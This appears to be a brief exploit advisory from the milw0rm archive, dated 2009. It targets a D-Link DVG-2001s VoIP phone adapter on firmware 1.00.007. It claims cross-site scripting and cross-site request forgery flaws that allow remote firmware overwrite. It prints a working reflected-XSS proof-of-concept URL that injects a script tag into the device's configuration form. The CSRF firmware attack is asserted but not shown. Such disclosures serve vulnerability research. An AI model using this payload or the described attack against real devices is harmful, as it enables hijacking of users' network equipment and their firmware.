D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite) model number: DVG-2001s f/w version 1.00.007 Better than just remote code execution, you control the firmware.
and xss which can be used for csrf bypass: http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E # milw0rm.com [2009-01-29]